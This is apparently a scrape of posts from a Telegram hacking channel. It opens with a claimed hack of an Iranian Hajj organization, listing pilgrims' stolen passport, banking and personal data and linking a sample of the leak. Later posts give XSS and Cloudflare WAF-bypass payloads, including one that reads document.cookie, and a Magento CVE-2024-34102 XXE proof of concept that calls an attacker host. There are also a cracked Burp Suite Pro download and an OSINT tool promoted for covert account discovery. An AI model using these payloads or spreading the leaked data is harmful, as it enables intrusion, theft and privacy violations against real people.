📢 Hajj and pilgrimage organization was hacked by @irleaks!


In short, we have the following from the pilgrims during the years 1363 to 1403:

- Name, surname, father's name, date of birth, place of birth, birth certificate number, national code, national card series, marital status, occupation
- Contact information (home and work address, postal code, landline and mobile phone)
- Detailed inquiry information from the passport police (passport number, date of issuance and expiration) + passport scan
- 3x4 photo of pilgrims
- Visitor flight information
- Pilgrim insurance information
- Bail document information
- Banking and payment information
- Complete information of Hajj brokers
- Information about the accommodation status of pilgrims
- Full details of government and government officials
- Full details of quota dispatch, such as the families of the martyrs
- Full details of deployment of Naja forces
- Full details of deployment of Basij forces
- Full details of spiritual missions
- The source code of the organization's programs and services

Total data volume: 1.25 TB

⬇️ Example:
https://mega.nz/file/sYg0AT7C#fbfecMm0TJSx5MF25dU5TUK8mZvdzkKhKRTsQJCs-F0

#Haj #News
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Time-Based SQL Injection

#SQL #Time_Based
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👁 Burpsuite Pro 👁

🔥 v2024.5

🔔 BurpBountyPro_v2.8.0 ➕

📂 README (en+ru) included, plz read it before run BS.

🔼 Run this version With Java SE JDK 22

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

Bypassing WAF through a large number of characters is a successful method

#Bypass #Waf
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕵️ Eyes is an OSINT tool to get existing accounts from an email

About:
Eyes is osint tool based on account search from an email address

Eyes is able to find not only if an account is existing on different sites but also to find the account in question (with certain modules)

even if the profile has nothing to do with the email 😲!

All this without warning the target 🕵️‍♂️

📊 Features of noscript:
⚪️ fully async
⚪️ asynchrone scraping
⚪️ menu in cli format (commands)


📂  Requirements / Launch:
⚪️ Python 3
⚪️ Git
⚪️ New terminal (to display emojis) # only for windows

💻 Usage:

usage: eyes.py [-h] [-m] [email]

positional arguments:
  email          search information on the target email with modules, services...

options:
  -h, --help     show this help message and exit
  -m, --modules  gives you all the email modules used by Eyes

😸 Github

⬇️ Download
🔒 BugCod3

#Osint #Email
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

payload

<img+src=oNlY=1+ onerror="alert(['a', 'x', 'b', 'x', 'c', 's'].map(c => c.replace(/[abc]/g, '')).join(''))">

<img+src=oNlY=1+ onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))">

#Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CVE-2024-34102 POC

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}

#CVE #POC
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

A Cloudflare WAF bypass combining simple (but efficient) tricks

<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>

A payload with some obfuscation & filter evasion tricks

<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>

#CF #WAF #Bypass #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

SSRF localhost aliases

#SSRF #Local
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Bug-Bounty-Wordlists

⬇️ Download
🔒 BugCod3

#BugBounty #Wordlist
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

This is how a Cybercriminal exploits phone calls to steal Data/OTP using IVR.

#News #Scam #Alert
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

excludeparked

💬
A lightweight Python 3 noscript that filters out parked HTTP domains from a list of domains. Useful when pulling a list of domains from a reverse WHOIS lookup service (from a tool such as WHOXY).

This was tested on a list of 100k parked domains but it's subject to improvement as this tool is intended to be a rough method of filtering down thousands of domains in the recon phase of a pentest.

🔼 Install:

cd excludeparked
pip install -r requirements.txt

💻 Usage:

python3 ./excludeparked.py -h

😸 Github

⬇️ Download
🔒BugCod3

#Python #Parked #Domain
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Simple Low-Hanging Bug:
Cache purge requests are not authenticated.

→ curl -X PURGE https://target[.]evil[.]com

→ curl -s -D - https://target[.]evil[.]com -o /dev/null

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XSS WAF Bypass by multi-char HTML entities

fj translates to fj
>⃒ translates to > + [?]
&nvlt; translates to < + [?]

[?] - Unicode symbol

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

dnsX

A fast and multi-purpose DNS toolkit designed for running DNS queries

💬
dnsx is a fast and multi-purpose DNS toolkit designed for running various probes through the retryabledns library. It supports multiple DNS queries, user supplied resolvers, DNS wildcard filtering like shuffledns etc.

📊 Features:
⚪️ Simple and Handy utility to query DNS records.
⚪️ A, AAAA, CNAME, PTR, NS, MX, TXT, SRV, SOA query support
⚪️ DNS Resolution / Brute-force support
⚪️ Custom resolver input support
⚪️ Multiple resolver format (TCP/UDP/DOH/DOT) support
⚪️ stdin and stdout support
⚪️ Automatic wildcard handling support

🔼 Installation:
dnsx requires go1.21 to install successfully. Run the following command to install the latest version:

go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest

💻 Usage:

dnsx -h

😸 Github

⬇️ Download
🔒 BugCod3

#cli #dns #bruteforce #wildcard
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

AlterX

Fast and customizable subdomain wordlist generator using DSL.

📊 Features:

⚪️ Fast and Customizable
⚪️ Automatic word enrichment
⚪️ Pre-defined variables
⚪️ Configurable Patterns
⚪️ STDIN / List input

🔼 Installation:
To install alterx, you need to have Golang 1.19 installed on your system.

go install github.com/projectdiscovery/alterx/cmd/alterx@latest

💻 Examples:
An example of running alterx on existing list of passive subdomains of tesla.com yield us 10 additional NEW and valid subdomains resolved using dnsx.

chaos -d tesla.com | alterx | dnsx

Similarly -enrich option can be used to populate known subdomains as world input to generate target aware permutations.

chaos -d tesla.com | alterx -enrich

You can alter the default patterns at run time using -pattern CLI option.

chaos -d tesla.com | alterx -enrich -p '{{word}}-{{suffix}}'

It is also possible to overwrite existing variables value using -payload CLI options.

alterx -list tesla.txt -enrich -p '{{word}}-{{year}}.{{suffix}}' -pp word=keywords.txt -pp year=2023

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #Subdomain #Generator #DSL
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

We have created this topic for you members, so that if you have something to share, you can do it and work together as a group. I also suggest that if there is something missing in our channel or topic, tell us as soon as possible. We will quickly fix it or provide it for you

📣 Channel: T.me/BugCod3
👤 Group: T.me/BugCod3GP
📊 Topic: T.me/BugCod3Topic
👤 Contact: T.me/BugCod3BOT

🥬 BADUnboxing 🥬

💬
BADUnboxing is an automated Android unpacker. It works by locating and decompiling code inside the APK that is relevant to the unpacking process.
Once Bad Unboxing detects packing, it automatically generates a new Java application based on the decompiled code. This new application can be executed to drop dynamic unpacked artifacts to disk.

📊 Contribute:
⚪️ Make a pull request
⚪️ Add a new Unpacking Module
⚪️ Add an Example to our Wiki
⚪️ Report an error/issue
⚪️ Suggest an improvement
⚪️ Share with others or give a star!

😸 Github

⬇️ Download
🔒 BugCod3

#JAVA #Unpacker #Android
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Payload XSS:

<IFRAME SRC="javanoscript:prompt(document.cookie);"></iframe>

#Payload #XSS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3